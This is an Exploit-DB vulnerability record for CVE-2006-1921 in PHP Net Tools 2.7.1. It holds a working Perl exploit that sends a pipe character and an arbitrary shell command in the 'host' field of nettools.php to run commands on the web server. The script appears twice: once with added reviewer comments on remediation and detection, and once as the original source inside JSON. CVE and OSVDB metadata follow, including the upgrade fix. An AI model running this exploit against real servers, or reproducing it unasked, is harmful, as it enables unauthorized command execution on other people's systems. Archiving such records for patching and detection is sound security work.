ID EDB-ID:1695
Type exploitdb
Reporter FOX_MULDER
Modified 2006-04-18T00:00:00
Description
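PHP Net Tools <= 2.7.1 remote code execution exploit (CVE-2006-1921): nettools.php allows arbitrary command execution via shell metacharacters in the `host` parameter. Webapps exploit for the PHP platform.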
#!/usr/bin/perl
# PHP Net Tools Remote Code Execution Exploit
#
# by FOX_MULDER (fox_mulder@abv.bg)
# Vulnerability found by FOX_MULDER.
#
# "Born to be root !!!"
#----------------------------------+
#PHP Net Tools |
#Copyright (C) 2005 Eric Robertson |
#h4rdc0d3@gmail.com |
#----------------------------------+
#
# Fact:Wbyte counted twice to infinity !!!
#
#
###################################################
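use LWP 5.64;
use strict;
use warnings;

# Proof of concept for CVE-2006-1921 (PHP Net Tools <= 2.7.1, nettools.php).
#
# What the script does: it sends a single POST to nettools.php with ping=1
# and a "host" field made of a pipe character followed by the command string
# given on the command line, then prints whatever the page returned between
# its <blockquote> tags.
#
# Reviewer notes for defenders:
#   * The flaw is server-side. Per the CVE text, shell metacharacters in the
#     "host" parameter lead to command execution; the vulnerable PHP is not
#     shown here, but presumably the field is concatenated into a shell
#     command line. The general fix for that pattern is to accept only a
#     hostname/IP-shaped value and to quote it (PHP: escapeshellarg())
#     before it reaches the shell.
#   * Remediation listed in the advisory: upgrade to 2.7.2 or later; no
#     workaround is known.
#   * Detection: POST bodies are absent from default web access logs, so
#     spotting this needs request-body logging or a WAF rule on nettools.php
#     that rejects a "host" value which is not a plain hostname or address
#     (here it starts with "|"). The User-Agent below is a hard-coded string
#     and is only a weak indicator.

# The original test was "@ARGV<2", which let the script run without the third
# argument and send an undefined command; all three values are used below.
if (@ARGV < 3) {
    print "\nUsage: ntools.pl www.site.com /dir/ \"ls \-la\" \n";
    exit();
}

my ($hostname, $dir, $command) = @ARGV;

print "=======================================================\n";
print "0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\n";
print "PHP Net Tools Command Execution Exploit by FOX_MULDER\n";
print "fox_mulder@abv.bg\r\n";
print "=======================================================\n";

my $browser = LWP::UserAgent->new;
$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
print "\n\n[+]Sending request to server . . .\r\n";

# $dir is appended as given, so the usage example's trailing slash yields
# "//nettools.php" in the request path.
my $url = "http://$hostname$dir/nettools.php";
my $response = $browser->post(
    $url,
    [
        'ping' => '1',
        'host' => "|$command",
    ]
);

my $code = $response->status_line;
print "[+] HTTP RESPONSE $code\n";
print "\n[+]Injecting command . . .\n";

# Only print the capture when the pattern matched; the original printed $1
# unconditionally, which is undefined (or stale) when the response carries no
# <blockquote> section.
if ($response->content =~ /blockquote>(.*)<\/blockquote>/s) {
    print "$1\n";
}
else {
    print "[-] No <blockquote> section found in the response\n";
}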
# milw0rm.com [2006-04-18]
{"id": "EDB-ID:1695", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit", "description": "PHP Net Tools <= 2.7.1 Remote Code Execution Exploit. CVE-2006-1921. Webapps exploit for php platform", "published": "2006-04-18T00:00:00", "modified": "2006-04-18T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/1695/", "reporter": "FOX_MULDER", "references": [], "cvelist": ["CVE-2006-1921"], "lastseen": "2016-01-31T14:41:40", "viewCount": 7, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2016-01-31T14:41:40", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-1921"]}, {"type": "osvdb", "idList": ["OSVDB:24783"]}], "modified": "2016-01-31T14:41:40", "rev": 2}, "vulnersScore": 7.8}, "sourceHref": "https://www.exploit-db.com/download/1695/", "sourceData": "#!/usr/bin/perl\n# PHP Net Tools Remote Code Execution Exploit\n#\n# by FOX_MULDER (fox_mulder@abv.bg)\n# Vulnerability found by FOX_MULDER.\n#\n# \"Born to be root !!!\"\n#----------------------------------+\n#PHP Net Tools |\n#Copyright (C) 2005 Eric Robertson |\n#h4rdc0d3@gmail.com |\n#----------------------------------+\n#\n# Fact:Wbyte counted twice to infinity !!!\n#\n#\n###################################################\n\tuse LWP 5.64;\n\n\tmy $hostname = $ARGV[0];\n\tmy $dir = $ARGV[1];\n\tmy $command = $ARGV[2];\n\n if (@ARGV<2) {\n\tprint \"\\nUsage: ntools.pl www.site.com /dir/ \\\"ls \\-la\\\" \\n\";\n\texit();\n\t}\n\t\n\tprint \"=======================================================\\n\";\n\tprint \"0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\\n\";\n\tprint \"PHP Net Tools Command Execution Exploit by FOX_MULDER\\n\";\n\tprint \"fox_mulder@abv.bg\\r\\n\";\n\tprint \"=======================================================\\n\";\n\n\tmy $browser = 
LWP::UserAgent->new;\n\t$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');\n\tprint \"\\n\\n[+]Sending request to server . . .\\r\\n\";\n\t\n\tmy $url = \"http://$hostname$dir/nettools.php\";\n\n\t\n\tmy $response = $browser->post( $url,[\n\t\t'ping' => '1',\n \t'host' => \"|$command\"]);\n\n \tmy $code = $response->status_line;\n print \"[+] HTTP RESPONSE $code\\n\";\n print \"\\n[+]Injecting command . . .\\n\";\n\t$response->content =~ /blockquote>(.*)<\\/blockquote>/s;\n\tprint \"$1\\n\";\n\n# milw0rm.com [2006-04-18]\n", "osvdbidlist": ["24783"]}
{"cve": [{"lastseen": "2021-02-02T05:27:20", "description": "nettools.php in PHP Net Tools 2.7.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the host parameter.", "edition": 4, "cvss3": {}, "published": "2006-04-20T18:06:00", "title": "CVE-2006-1921", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1921"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:php_net_tools:php_net_tools:2.7.1"], "id": "CVE-2006-1921", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1921", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php_net_tools:php_net_tools:2.7.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:21", "bulletinFamily": "software", "cvelist": ["CVE-2006-1921"], "edition": 1, "description": "## Solution Description\nUpgrade to version 2.7.2 or higher, as it has been reported to fix this vulnerability. 
An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.hotscripts.com/Detailed/47915.html\n[Secunia Advisory ID:19694](https://secuniaresearch.flexerasoftware.com/advisories/19694/)\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000840.html\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000839.html\nGeneric Exploit URL: http://milw0rm.com/exploits/1695\n[CVE-2006-1921](https://vulners.com/cve/CVE-2006-1921)\n", "modified": "2006-04-18T08:32:35", "published": "2006-04-18T08:32:35", "href": "https://vulners.com/osvdb/OSVDB:24783", "id": "OSVDB:24783", "type": "osvdb", "title": "PHP Net Tools nettools.php host Variable Arbitrary Command Execution", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}